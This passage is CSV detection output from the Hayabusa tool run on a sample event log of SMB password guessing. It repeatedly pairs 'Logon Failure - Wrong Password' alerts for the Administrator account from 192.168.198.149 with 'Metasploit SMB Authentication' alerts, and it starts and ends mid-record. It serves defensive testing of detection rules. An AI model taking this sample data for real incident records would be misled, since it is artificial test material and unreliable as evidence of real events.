Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FljAF4LWLmWNa3kL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.400 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.447 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RnN5mBOaAvYu25G7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.447 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: llBt31S46QVzg0Ki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.476 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b1rvJUZo91Kka0G1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7Zqi86ZSFGRnoFM4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GeyeVdCUmHEKxR8f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DwxJVXt79KBZalqS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.708 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TDfRu1OTlHmyc38P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.748 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OLCAMPDWti9hjHtV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.790 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k2eViuJeorX2peGP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.833 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: davOE9p1fF2LbDP7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.868 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.922 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YFQsEbZnm94eSuUl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.922 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UnNcBIPoWdJH0x7M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8Fw1xVFyar0Cal2J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.997 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FWzn4Oa8PQdH9Gqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.040 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b68beIB5BKyMv8d3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HeXSJhEXzpiRX8BT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BQ8Zu7ByLWddD4Tk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.169 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: paQzUptV8scmJvsG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.234 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WQLsoIX9LPvbockz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.234 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xRYbdVMbUlqFK8oM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.272 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OSO730O1fxDL4DfQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5wmniv339HLGKB4u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.352 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rO3mxvgSES0lVN34 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.397 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.433 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fvK9k9tnCq5hwBqe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.433 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ujFfMT6I6L8OHag9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.465 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FWKY2Wh21sePUR1L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.517 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6E6yf8D5cPOEwR0y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.562 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OpFho8k52BkBlg4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.605 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ucDvfSfDYZzjNWFS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.645 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vnq3S0gEE98xfYLv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: seVfaEdAS6lEXgkG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gz8BQAlyYXB61tx3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.764 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nkHLs6yikRWVjj9F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.805 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0bQUcnUBCmE81G6I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.840 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BceDCcXoHJQv9pDi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.873 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GCCLt49g8wmAMEyV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.916 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pM6C8KRcxVIUsZrZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.947 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fw5DU6l3QRVl9cWY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.984 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 37UthbuO3m4Lr7dU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: URB7Ji5pQleLtvy4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: orP9OgiBrYIKZPXE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.101 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZwvdnlIWhqoDg8On : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.132 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v6dXVbmLBpXc39ah : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.181 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8Mu7amiHAg0l7bza : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.229 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JdG6F697kAXFDx9m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.276 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jY5AAnfQMH3VZQUa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.321 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 